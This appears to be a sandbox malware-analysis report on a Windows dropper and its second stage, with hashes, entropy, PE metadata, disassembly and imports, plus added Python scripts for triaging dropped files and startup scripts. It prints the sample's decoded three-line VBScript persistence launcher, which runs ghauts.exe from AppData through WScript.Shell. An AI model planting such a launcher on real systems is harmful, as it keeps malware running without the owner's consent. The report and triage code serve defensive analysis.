                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..
                                                                                                                          Process:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):242688
                                                                                                                          Entropy (8bit):7.863716781433369
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:WfwUw6ewAKanQOmqYR8upGluho/Sn6+AWzXX0umqA7Tah45Dnz7QB:WDfet5nfYREAwS6+Bzn3iPm49z7QB
                                                                                                                          MD5:58412BC618CB35E18913D632DB5BFCDF
                                                                                                                          SHA1:1F83979BDB99C654A742F47CA514E621DCDF8E92
                                                                                                                          SHA-256:E7316A4ED2628FFE37FE57E711B0DD9F3B06706E3F269F8BB0C454DEBAE0265C
                                                                                                                          SHA-512:9C55E9D63F0E14F4CD99FBD2D4E82912A399B79CFDDA5E0F6914DE85599155611AD3CBD8A64B962BFDC9C8263DE420153AFC21843B114BB520809C0A2F293830
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.m.YGFYE4VEH.ZB.FJM0KY7.YDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZB.FJM>T.9Q.M.x.1..if>31r68"W98Zq:%(7*Dv'-.$/,r/$mt...<6 #wH=\aH2VZBRF"].fuF.'h7.;.'.6.u%<m7.3;..Iz(.8u4.(.9.(ha<8V<.5k.8'.7.;.u>6.'.<./)%.:.IQYDFYE0VEH2VZBRF..-Y7QY..YE|WAHF.Z.RFJM0KY7.YgGRD9VE.3VZZPFJM0Kv.QYDVYE0.DH2V.BRVJM0IY7TYDFYE0V@H2VZBRFJM4KY3QY.}[E2VE.2VJBRVJM0KI7QIDFYE0VUH2VZBRFJM0K."SY.FYE06GH..[BRFJM0KY7QYDFYE0VEH2VZBRF..1KE7QYDFYE0VEH2VZBRFJM0KY7QYDF.H2V.H2VZBRFJM0KY.PY.GYE0VEH2VZBRFJM0KY7QYDFYE0Vk<W..BRFR.1KY'QYD.XE0REH2VZBRFJM0KY7qYD&w7T71)2V./RFJ.1KYYQYD.XE0VEH2VZBRFJMpKYw.=%28E0V.x2VZbPFJ[0KY=SYDFYE0VEH2VZB.FJ..9*E2YDFi.1VE(0VZ.SFJm2KY7QYDFYE0VEHrVZ.RFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0V
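The three 240,744-byte blobs above (one dropped by 3i1gMM8K4z.exe, two by ghauts.exe) share one SHA-256 and an 8-bit entropy of 7.98, and the 242,688-byte blob sits at 7.86, yet every one of them is listed as "Encrypted: false". That flag is a sandbox heuristic; entropy this close to 8.0 is what compressed or encrypted payload containers produce, so a practitioner triaging the dropped files would group them by hash and let the entropy value drive the verdict. The script below is an added example of that triage, not code from the report or from Joe Sandbox: it reproduces the "Entropy (8bit)" metric (Shannon entropy in bits per byte), deduplicates by SHA-256, and flags blobs above an assumed 7.9 threshold. The inputs are constructed stand-ins, not the real dropped files.

```python
import hashlib
import math
from collections import defaultdict

# Constructed stand-ins for the report's dropped files: (parent process, label, content).
# Three byte-identical high-entropy blobs mirror the shared-hash entries above; the last
# entry is a low-entropy UTF-16LE script. None of this is the real dropped content.
DROPPED = [
    ("3i1gMM8K4z.exe", "blob_a", bytes(range(256)) * 940),
    ("ghauts.exe", "blob_b", bytes(range(256)) * 940),
    ("ghauts.exe", "blob_c", bytes(range(256)) * 940),
    ("ghauts.exe", "startup.vbs",
     'Set WshShell = CreateObject("WScript.Shell")\n'.encode("utf-16-le")),
]

# Assumed threshold: compressed or encrypted data sits just under the 8.0 maximum.
ENTROPY_SUSPECT = 7.9


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the same metric the report labels 'Entropy (8bit)'.
    0.0 for a constant byte stream, 8.0 for a uniform distribution over all 256 values."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(dropped) -> list:
    """Group dropped files by SHA-256 so identical payloads written to several paths are
    analysed once, then score each unique blob by entropy."""
    by_hash = defaultdict(list)
    for parent, name, content in dropped:
        by_hash[hashlib.sha256(content).hexdigest()].append((parent, name, content))

    findings = []
    for sha256, entries in by_hash.items():
        content = entries[0][2]          # all entries in the group are byte-identical
        ent = shannon_entropy(content)
        findings.append({
            "sha256": sha256,
            "size": len(content),
            "entropy": round(ent, 3),
            # every (parent, name) pair that wrote this exact content
            "copies": [(parent, name) for parent, name, _ in entries],
            "likely_encrypted_or_packed": ent >= ENTROPY_SUSPECT,
        })
    return findings


if __name__ == "__main__":
    for f in triage(DROPPED):
        print(f["sha256"][:16], f["size"], f["entropy"], f["copies"],
              "SUSPECT" if f["likely_encrypted_or_packed"] else "")
```

On a real report the grouping step is what tells you that ghauts.exe re-dropped the same container the first stage wrote rather than a second payload; the entropy score is what separates a staged encrypted blob from, say, a plain-text script, whatever the "Encrypted" column says.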
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):268
                                                                                                                          Entropy (8bit):3.410606351568962
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1qlOaY3cEtDdnriIM8lfQVn:DsO+vNloRKQ1cYsGmA2n
                                                                                                                          MD5:24F37753E5CEADF625BDAB88925EC25B
                                                                                                                          SHA1:DDC4B2F2ACAA667B8ED8A4DA2CE1CC5D7C04AB3B
                                                                                                                          SHA-256:3ECBBD615EF1AEB1F10B8EE64EE014981A15BB5C52A0427A414216C6531F131A
                                                                                                                          SHA-512:F551BCC7B60CBABB9C5E80347D0C7FC7AF6AFBE41ED30CD75F380BA4E40C1BC649AF4F711D4E840E0BA41E56C04A5F2FE410C1982D54AEF6E2D4D9F2D04A5892
                                                                                                                          Malicious:true
Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.O.k.e.g.h.e.m.\.g.h.a.u.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Decoded (the file is UTF-16LE text without a BOM, two bytes per character; 268 bytes = 134 characters over three lines):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\jones\AppData\Local\Okeghem\ghauts.exe", 1
Set WshShell = Nothing
Note that the Run target hardcodes the user name "jones", which does not match the profile path the dropper actually used on this machine (C:\Users\user\AppData\Local\Okeghem\ghauts.exe).
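The script above is the persistence mechanism behind the "Drops VBS files to the startup folder" and "WScript or CScript Dropper" signatures: a three-line VBScript, written as UTF-16LE, that uses WScript.Shell to launch the second stage from a per-user writable directory. Two details matter when hunting for it on other hosts: the encoding defeats a naive ASCII grep for "WScript.Shell", and the Run target embeds a literal user name rather than an environment variable. The following is an added example of a triage routine for Startup-folder scripts, not code from the report or from Joe Sandbox: it decodes the script whatever its encoding, extracts each Run target, and flags user-writable launch paths and a user-name mismatch. The sample script is constructed from the decoded preview on the page; the extension list and the "user" analysis account are assumptions.

```python
import re
from pathlib import Path

# Constructed stand-in for the dropped startup script: the decoded text from the report,
# re-encoded as BOM-less UTF-16LE exactly as the preview shows (268 bytes). It is not the
# real dropped file.
SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\jones\\AppData\\Local\\Okeghem\\ghauts.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

RUN_CALL = re.compile(r'\.Run\s*"([^"]+)"', re.IGNORECASE)
PROFILE_PATH = re.compile(r'^[A-Z]:\\Users\\([^\\]+)\\', re.IGNORECASE)
USER_WRITABLE = re.compile(r'^[A-Z]:\\Users\\[^\\]+\\AppData\\', re.IGNORECASE)


def decode_script(raw: bytes) -> str:
    """Decode a dropped script of unknown encoding: honour a BOM if present, then recognise
    BOM-less UTF-16LE by the NUL in every odd byte (the pattern behind the report's dotted
    preview), otherwise treat the bytes as single-byte ANSI text."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    if len(raw) >= 8 and raw[1:8:2] == b"\x00" * 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("cp1252", errors="replace")


def triage_startup_script(raw: bytes, analysis_user: str = "user") -> list:
    """Return one finding per WScript.Shell Run target found in the script."""
    text = decode_script(raw)
    findings = []
    for target in RUN_CALL.findall(text):
        m = PROFILE_PATH.match(target)
        findings.append({
            "target": target,
            "uses_wscript_shell": "WScript.Shell" in text,
            # launched from a per-user writable tree: no admin rights needed to plant it
            "in_user_writable_dir": bool(USER_WRITABLE.match(target)),
            # a user name baked into the path instead of %LOCALAPPDATA%; compare it with
            # the profile the dropper actually ran under
            "hardcoded_user": m.group(1) if m else None,
            "user_mismatch": bool(m) and m.group(1).lower() != analysis_user.lower(),
        })
    return findings


def scan_startup_folder(folder: Path, analysis_user: str = "user") -> dict:
    """Triage every script-host file in a Startup folder on a live host, e.g.
    %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (extension list assumed)."""
    results = {}
    for path in folder.iterdir():
        if path.suffix.lower() in {".vbs", ".vbe", ".js", ".jse", ".wsf"}:
            results[path.name] = triage_startup_script(path.read_bytes(), analysis_user)
    return results


if __name__ == "__main__":
    for finding in triage_startup_script(SAMPLE_VBS):
        print(finding)
```

Decoding before matching is the whole point: a detection that searches the raw bytes for `WScript.Shell` or `.Run` misses this file because every character is followed by a NUL, while a detection that decodes first sees the same three lines the sandbox rendered.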
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.1731495033367105
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:3i1gMM8K4z.exe
                                                                                                                          File size:1'147'904 bytes
                                                                                                                          MD5:1d0c53e42bd84b7b7cfabed7dae7f570
                                                                                                                          SHA1:0b0df40afe9bed5720c361fe7ed63395e1a25f41
                                                                                                                          SHA256:ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944
                                                                                                                          SHA512:9ab7671f48d5dbeb58c93b61998762ed91da2f566421ff11f53edfdb6a65af0199ff4bb31647ec296cae7f85ba7cfc71340fbb931e6a05fd5aa03a43f5026057
                                                                                                                          SSDEEP:24576:cu6J33O0c+JY5UZ+XC0kGso6FaNAaW2Kh7ZClY9lnmWY:Gu0c++OCvkGs9FaNAaWphNCC1Y
                                                                                                                          TLSH:7835CE2273DDC360CB669173BF6AB7016EBF7C610630B85B2F880D79A950171166DBA3
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                          Icon Hash:3570b480858580c5
                                                                                                                          Entrypoint:0x427dcd
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6756289D [Sun Dec 8 23:15:41 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                          Instruction
                                                                                                                          call 00007FBDB0B18E7Ah
                                                                                                                          jmp 00007FBDB0B0BC44h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                                          mov eax, ecx
                                                                                                                          mov edx, ecx
                                                                                                                          add eax, esi
                                                                                                                          cmp edi, esi
                                                                                                                          jbe 00007FBDB0B0BDCAh
                                                                                                                          cmp edi, eax
                                                                                                                          jc 00007FBDB0B0C12Eh
                                                                                                                          bt dword ptr [004C31FCh], 01h
                                                                                                                          jnc 00007FBDB0B0BDC9h
                                                                                                                          rep movsb
                                                                                                                          jmp 00007FBDB0B0C0DCh
                                                                                                                          cmp ecx, 00000080h
                                                                                                                          jc 00007FBDB0B0BF94h
                                                                                                                          mov eax, edi
                                                                                                                          xor eax, esi
                                                                                                                          test eax, 0000000Fh
                                                                                                                          jne 00007FBDB0B0BDD0h
                                                                                                                          bt dword ptr [004BE324h], 01h
                                                                                                                          jc 00007FBDB0B0C2A0h
                                                                                                                          bt dword ptr [004C31FCh], 00000000h
                                                                                                                          jnc 00007FBDB0B0BF6Dh
                                                                                                                          test edi, 00000003h
                                                                                                                          jne 00007FBDB0B0BF7Eh
                                                                                                                          test esi, 00000003h
                                                                                                                          jne 00007FBDB0B0BF5Dh
                                                                                                                          bt edi, 02h
                                                                                                                          jnc 00007FBDB0B0BDCFh
                                                                                                                          mov eax, dword ptr [esi]
                                                                                                                          sub ecx, 04h
                                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                                          mov dword ptr [edi], eax
                                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                                          bt edi, 03h
                                                                                                                          jnc 00007FBDB0B0BDD3h
                                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                                          sub ecx, 08h
                                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                                          movq qword ptr [edi], xmm1
                                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                                          test esi, 00000007h
                                                                                                                          je 00007FBDB0B0BE25h
                                                                                                                          bt esi, 03h
                                                                                                                          jnc 00007FBDB0B0BE78h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x4fb08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x117000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x4fb08 | 0x4fc00 | 265d993524cad22adcc96f02f940b413 | False | 0.9726103301332288 | data | 7.96492014201574 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x117000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc77d0 | 0x162c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.906800563777308
RT_MENU | 0xc8dfc | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc8e4c | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc93e0 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xc9a6c | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xc9efc | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xca4f8 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcab54 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcafbc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcb114 | 0x4b4d5 | data | | | 1.0003274574710557
RT_GROUP_ICON | 0x1165ec | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0x116600 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x116614 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x116628 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11663c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x116718 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
